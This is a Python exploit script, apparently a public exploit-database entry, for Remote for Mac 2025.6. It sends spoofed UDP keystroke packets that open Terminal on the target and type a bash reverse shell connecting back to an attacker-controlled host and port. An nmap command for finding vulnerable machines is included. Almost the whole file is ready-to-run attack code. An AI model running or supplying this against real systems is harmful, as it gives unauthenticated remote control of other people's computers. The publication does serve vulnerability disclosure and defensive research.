# Exploit Title: Remote for Mac 2025.6 - Remote Code Execution (RCE)
# Date: 2025-05-27
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://cherpake.com/
# Software Link: https://cherpake.com/latest.php?os=mac
# Version: 2025.6
# Tested on: macOS Mojave 10.14.6

#!/usr/bin/env python3


'''
The vulnerability in Remote for Mac 2025.6 allows an unauthenticated remote
attacker to achieve Remote Code Execution (RCE)
by sending a crafted sequence of UDP packets that simulate keyboard input.

- Works when "Allow unknown devices" setting is enabled (default: disabled)

# Identification:
nmap -p- -T4 <TARGET_IP> --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer

'''

import socket
from time import sleep


target_ip = "192.168.8.102"
target_port = 49229

lhost = "192.168.8.100"
lport = "4444"

initial_packets_hex = [
    "07000200370001", # press ⌘ (Command key)
    "07000200370001",
    "060003002000", # space
    "07000200370000",
    "07000200370000" # release ⌘
]


final_packets_hex = [
    "07000200240001",
    "07000200240000"
]


sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

print("Starting exploit..")

for i, hex_packet in enumerate(initial_packets_hex):
    packet = bytes.fromhex(hex_packet)
    sock.sendto(packet, (target_ip, target_port))


sleep(1)


prefix = bytes.fromhex("06000300")
text = "terminal"

for i, ch in enumerate(text):
    ch_utf16le = ch.encode("utf-16le")
    packet = prefix + ch_utf16le
    sock.sendto(packet, (target_ip, target_port))


sleep(2)


for i, hex_packet in enumerate(final_packets_hex):
    packet = bytes.fromhex(hex_packet)
    sock.sendto(packet, (target_ip, target_port))


sleep(2)

payload = f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
print(f"Typing the reverse shell payload..")

for i, ch in enumerate(payload):
    ch_utf16le = ch.encode("utf-16le")
    packet = prefix + ch_utf16le
    sock.sendto(packet, (target_ip, target_port))


sleep(2)

print("Executing payload..")

for i, hex_packet in enumerate(final_packets_hex):
    packet = bytes.fromhex(hex_packet)
    sock.sendto(packet, (target_ip, target_port))

sleep(2)
print("Exploit completed.")

sock.close()